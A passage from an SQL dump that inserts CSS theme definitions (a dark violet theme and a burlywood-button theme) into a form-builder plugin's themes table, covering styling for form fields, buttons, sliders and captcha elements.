relative;\r\n}\r\n.wdform_percentage_title {\r\n	color: #000000;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 20px;\r\n	height: 20px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_button button {\r\n	background: #4D792C;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 0px;\r\n	min-width: 80px;\r\n	min-height: 31px;\r\n	color: #fff;\r\n	border: 2px solid #68943B;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}', 0),
(26, 'Theme 07 dark violet', '.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #F0EFEF;\r\nborder: 1px solid #33016B;\r\nmargin-bottom: 10px;\r\ncolor: #33016B;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\na.ui-slider-handle {\r\n	width: 16px;\r\n	height: 16px;\r\n	top: -6px;\r\n	border: 0px;\r\n	border-radius: 13px;\r\n	background: #A4A4A4;\r\n	border: 1px solid #fff;\r\n	outline: none;\r\n}\r\n.ui-slider {\r\n	height: 6px;\r\n	background: #F1F1F1 !important;\r\n	margin: 7px 0px;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell input[type="text"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #E9E9E9;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n	color: #696969;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 0px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\na.ui-spinner-button:hover{\r\n	background: #33016B !important;\r\n	color: #fff;\r\n}\r\na.ui-spinner-button:active{\r\n	background: #33016B !important;\r\n	color: #fff;\r\n}\r\na.ui-spinner-button:focus{\r\n	background: #33016B !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:hover{\r\n	background: #33016B !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:active{\r\n	background: #33016B !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:focus{\r\n	background: #33016B !important;\r\n	color: #fff;\r\n}\r\nui-state-hover {\r\n	background: #33016B !important;\r\n	color: #fff;\r\n}\r\n.ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-content .ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-header .ui-state-default {\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-slider-range {\r\n	background: #ccc !important;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #fff;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100%;\r\n	border: 0px !important;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100%;\r\n}\r\n.sel-wrap select {\r\n	position: absolute;\r\n z-index:-1;\r\n width: 0px !important;\r\n}\r\n.sel-imul {\r\n	display: inline-block;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	border-radius: 0px;\r\n	padding: 0px 0px 0px 2px;\r\n	font-size: 13px;\r\n	height: 22px;\r\n	line-height: 22px;\r\n	overflow: hidden;\r\n	background: #F1F1F1;\r\n	border: 0px solid #ccc;\r\n	background-position: right 2px center;\r\n	width: 100%;\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 23px;\r\n	width: 30px;\r\n	background: url([SITE_ROOT]/images/07/01.png) 50% 50% no-repeat;\r\n	position: absolute;\r\n	top: 0px;\r\n	right: 0px;\r\n	padding: 0px;\r\n}\r\n.sel-imul:hover .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul.act .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text]{\r\n	margin: 0px;\r\n}\r\ninput[type=password]{\r\n	margin: 0px;\r\n}\r\ninput[type=url]{\r\n	margin: 0px;\r\n}\r\ninput[type=email]{\r\n	margin: 0px;\r\n}\r\ninput.text{\r\n	margin: 0px;\r\n}\r\ninput.title{\r\n	margin: 0px;\r\n}\r\ntextarea{\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	position: absolute;\r\n	border-radius: 0px;\r\n	height: 23px;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	}\r\n.file-picker {\r\n	width: 71px;\r\n	height: 32px;\r\n	background: url([SITE_ROOT]/images/07/upload.png);\r\n	display: inline-block;\r\n}\r\n.next-page div.wdform-page-button {\r\n	color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 32px;\r\n	background:url([SITE_ROOT]/images/07/next.png) no-repeat right #33016B;\r\n	padding: 0px 36px 0 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n}\r\n.previous-page div.wdform-page-button {\r\n	color: #A2A2A2;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 32px;\r\n	background:url([SITE_ROOT]/images/07/previous.png) no-repeat left #F0EFEF;\r\n	padding: 0 20px 0 36px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	border-right: 1px solid #CECECE;\r\n}\r\n.button-submit {\r\n	color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	line-height: 35px;\r\n	background: #33016B;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	min-width: 80px;\r\n	min-height: 35px;\r\n	font-family: Segoe UI;\r\n	border: 1px solid transparent;\r\n	margin: 5px;\r\n}\r\n.button-reset {\r\n	color: #787878;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	line-height: 35px;\r\n	background: #F0EFEF;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	min-width: 80px;\r\n	min-height: 35px;\r\n	font-family: Segoe UI;\r\n	float: right;\r\n	border: 1px solid transparent;\r\n	margin: 5px;\r\n}\r\n.wdform_page {\r\n	background: #FFFFFF;\r\n	padding-top: 15px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_column {\r\n	padding-right: 50px !important;\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform_section_break2 {\r\n	color: #33016B;\r\n	display: inline-block;\r\n	text-align: left;\r\n	font-size: 20px;\r\nmargin: 16px 0px;\r\n}\r\n\r\n.wdform_section_break {\r\n	color: #33016B;\r\n	font-size: 20px;\r\nmargin: 16px 0px;\r\n\r\n}\r\n.wdform_section {\r\n	display: inline-block;\r\n}\r\nselect {\r\n	border-radius: 0px;\r\n	height: 24px;\r\n	overflow: hidden;\r\n	padding: 2px;\r\nbackground: #F1F1F1;\r\nborder: 1px solid transparent;\r\ncolor: #696969;\r\n	outline: none;\r\n}\r\ninput[type="text"] {\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F1F1F1;\r\n	border: 1px solid transparent;\r\ncolor: #696969;\r\n}\r\ninput[type="password"] {\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F1F1F1;\r\n	border: 1px solid transparent;\r\ncolor: #696969;\r\n}\r\ntextarea {\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F1F1F1;\r\n	border: 1px solid transparent;\r\ncolor: #696969;\r\n}\r\ninput[type="text"]:focus{\r\n	outline: none;\r\n}\r\ninput[type="password"]:focus{\r\n	outline: none;\r\n}\r\ntextarea:focus{\r\n	outline: none;\r\n}\r\n\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 30px;\r\n	vertical-align: middle;\r\n}\r\n.checkbox-div input[type=checkbox] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.checkbox-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #A7A7A7;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n}\r\n.checkbox-div label {\r\n	cursor: pointer;\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: " ";\r\n	position: absolute;\r\n	width: 16px;\r\n	height: 13px;\r\n	background: url([SITE_ROOT]/images/03/checkbox.png);\r\n	border-radius: 0px;\r\n	top: -3px;\r\n	left: 1px;\r\n}\r\n.checkbox-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .checkbox-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div input[type=checkbox]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/03/date.png) no-repeat !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 22px;\r\n	height: 22px;\r\n	position: relative;\r\n	left: -22px;\r\n	vertical-align: top;\r\n	outline: none;\r\n}\r\n.radio-div input[type=radio] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n.radio-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #A7A7A7;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n	top: 2px;\r\n}\r\n.radio-div label {\r\n	cursor: pointer;\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: " ";\r\n	position: absolute;\r\n	width: 9px;\r\n	height: 8px;\r\n	background: #A7A7A7;\r\n	border-radius: 0px;\r\n	top: 2px;\r\n	left: 2px;\r\n}\r\n.radio-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .radio-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div input[type=radio]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.if-ie-div-label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #000;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	margin-top: 15px;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: "Lucida Grande", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #A8A8A8;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #000;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: red;\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n	border-radius: 0px;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\n	color: #33016B;\r\n	background-color: #ECEBEB;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 20px;\r\n	text-align: center;\r\n	vertical-align: bottom;\r\n	padding-top: 5px;\r\n	padding: 5px 25px 0px 25px;\r\n	font-size: 12px;\r\n}\r\n.page_active {\r\n	color: #fff;\r\n	cursor: pointer;\r\n	background-color: #33016B;\r\n	display: inline-block;\r\n	vertical-align: bottom;\r\n	height: 25px;\r\n	text-align: center;\r\n	font-size: 16px;\r\n	padding: 5px 30px 0px 30px;\r\n}\r\n.page_percentage_active {\r\n	padding: 0px;\r\n	margin: 0px;\r\n	border-spacing: 0px;\r\n	height: 18px;\r\n	line-height: 18px;\r\n	font-size: 15px;\r\n	float: left;\r\n	text-align: right !important;\r\n	z-index: 1;\r\n	position: relative;\r\n	background: #33016A ; /* Old browsers */\r\n	background: -moz-linear-gradient(left, #33016B 0%, #320169 39%, #33016A 100%); /* FF3.6+ */\r\n	background: -webkit-gradient(linear, left top, right top, color-stop(0%, #33016B ), color-stop(39%, #320169 ), color-stop(100%, #33016A )); /* Chrome,Safari4+ */\r\n	background: -webkit-linear-gradient(left, #33016B 0%, #320169 39%, #33016A 100%); /* Chrome10+,Safari5.1+ */\r\n	background: -o-linear-gradient(left, #33016B 0%, #320169 39%, #33016A 100%); /* Opera 11.10+ */\r\n	background: -ms-linear-gradient(left, #33016B 0%, #320169 39%, #33016A 100%); /* IE10+ */\r\nbackground: linear-gradient(to right, #33016B 0%, #320169 39%, #33016A 100%);\r\n	vertical-align: middle;\r\n}\r\n.page_percentage_deactive {\r\n	height: 18px;\r\n	line-height: 20px;\r\n	background-color: #EBEAEA;\r\n	text-align: left !important;\r\n	margin-bottom: 1px;\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: center!important;\r\n	margin-bottom: 0px;\r\n}\r\n.wdform_page_navigation:after {\r\n	content: " ";\r\n	display: block;\r\n	height: 9px;\r\n	background: url([SITE_ROOT]/images/07/0.png) no-repeat;\r\n	position: relative;\r\n	background-size: cover;\r\n	top: -9px;\r\n}\r\n.wdform_percentage_text {\r\n	margin-right:9px;\r\n	color: #FFFFFF;\r\n	font-weight: normal;\r\n	font-size: 13px;\r\n	position: relative;\r\n}\r\n.wdform_percentage_title {\r\n	color: #000000;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 20px;\r\n	height: 20px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_button button {\r\n	background: #4D792C;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 0px;\r\n	min-width: 80px;\r\n	min-height: 31px;\r\n	color: #fff;\r\n	border: 2px solid #68943B;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}\r\n', 0);
INSERT INTO `cyb_formmaker_themes` (`id`, `title`, `css`, `default`) VALUES
(27, 'Theme 07 transparent (burlywood button)', '.radio-div input[type="radio"],\r\n.checkbox-div input[type="checkbox"]\r\n{\r\nvisibility: hidden;\r\n}\r\n.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #F0EFEF;\r\nborder: 1px solid #E6C18B;\r\nmargin-bottom: 10px;\r\ncolor: #E6C18B;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\na.ui-slider-handle {\r\n	width: 16px;\r\n	height: 16px;\r\n	top: -6px;\r\n	border: 0px;\r\n	border-radius: 13px;\r\n	background: #A4A4A4;\r\n	border: 1px solid #fff;\r\n	outline: none;\r\n}\r\n.ui-slider {\r\n	height: 6px;\r\n	background: #F1F1F1 !important;\r\n	margin: 7px 0px;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell input[type="text"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #E9E9E9;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n	color: #696969;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 0px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\na.ui-spinner-button:hover{\r\n	background: #E6C18B !important;\r\n	color: #fff;\r\n}\r\na.ui-spinner-button:active{\r\n	background: #E6C18B !important;\r\n	color: #fff;\r\n}\r\na.ui-spinner-button:focus{\r\n	background: #E6C18B !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:hover{\r\n	background: #E6C18B !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:active{\r\n	background: #E6C18B !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:focus{\r\n	background: #E6C18B !important;\r\n	color: #fff;\r\n}\r\nui-state-hover {\r\n	background: #E6C18B !important;\r\n	color: #fff;\r\n}\r\n.ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-content .ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-header .ui-state-default {\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-slider-range {\r\n	background: #ccc !important;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #fff;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100%;\r\n	border: 0px !important;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100%;\r\n}\r\n.sel-wrap select {\r\n	position: absolute;\r\n z-index:-1;\r\n width: 0px !important;\r\n}\r\n.sel-imul {\r\n	display: inline-block;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	border-radius: 0px;\r\n	padding: 0px 0px 0px 2px;\r\n	font-size: 13px;\r\n	height: 22px;\r\n	line-height: 22px;\r\n	overflow: hidden;\r\n	background: #F1F1F1;\r\n	border: 0px solid #ccc;\r\n	background-position: right 2px center;\r\n	width: 100%;\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 23px;\r\n	width: 30px;\r\n	background: url([SITE_ROOT]/images/07/01.png) 50% 50% no-repeat;\r\n	position: absolute;\r\n	top: 0px;\r\n	right: 0px;\r\n	padding: 0px;\r\n}\r\n.sel-imul:hover .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul.act .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text]{\r\n	margin: 0px;\r\n}\r\ninput[type=password]{\r\n	margin: 0px;\r\n}\r\ninput[type=url]{\r\n	margin: 0px;\r\n}\r\ninput[type=email]{\r\n	margin: 0px;\r\n}\r\ninput.text{\r\n	margin: 0px;\r\n}\r\ninput.title{\r\n	margin: 0px;\r\n}\r\ntextarea{\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	position: absolute;\r\n	border-radius: 0px;\r\n	height: 23px;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	}\r\n.file-picker {\r\n	width: 71px;\r\n	height: 32px;\r\n	background: url([SITE_ROOT]/images/07/upload.png);\r\n	display: inline-block;\r\n}\r\n.next-page div.wdform-page-button {\r\n	color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 32px;\r\n	background:url([SITE_ROOT]/images/07/next.png) no-repeat right #E6C18B;\r\n	padding: 0px 36px 0 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n}\r\n.previous-page div.wdform-page-button {\r\n	color: #A2A2A2;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 32px;\r\n	background:url([SITE_ROOT]/images/07/previous.png) no-repeat left #F0EFEF;\r\n	padding: 0 20px 0 36px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	border-right: 1px solid #CECECE;\r\n} \r\n.button-submit {\r\n	color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	line-height: 35px;\r\n	background: #E6C18B;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	min-width: 80px;\r\n	min-height: 35px;\r\n	font-family: Segoe UI;\r\n	border: 1px solid transparent;\r\n	margin: 5px;\r\n}\r\n.button-reset {\r\n	color: #787878;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	line-height: 35px;\r\n	background: #F0EFEF;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	min-width: 80px;\r\n	min-height: 35px;\r\n	font-family: Segoe UI;\r\n	float: right;\r\n	border: 1px solid transparent;\r\n	margin: 5px;\r\n}\r\n.wdform_page {\r\n	background: transparent;\r\n	padding-top: 15px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_column {\r\n	padding-right: 50px !important;\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform_section_break2 {\r\n	color: #267EA9;\r\n	display: inline-block;\r\n	text-align: left;\r\n	font-size: 20px;\r\nmargin: 16px 0px;\r\n}\r\n\r\n.wdform_section_break {\r\n	color: #267EA9;\r\n	font-size: 20px;\r\nmargin: 16px 0px;\r\n\r\n}\r\n.wdform_section {\r\n	display: inline-block;\r\n}\r\nselect {\r\n	border-radius: 0px;\r\n	height: 24px;\r\n	overflow: hidden;\r\n	padding: 2px;\r\nbackground: #F1F1F1;\r\nborder: 1px solid transparent;\r\ncolor: #696969;\r\n	outline: none;\r\n}\r\ninput[type="text"] 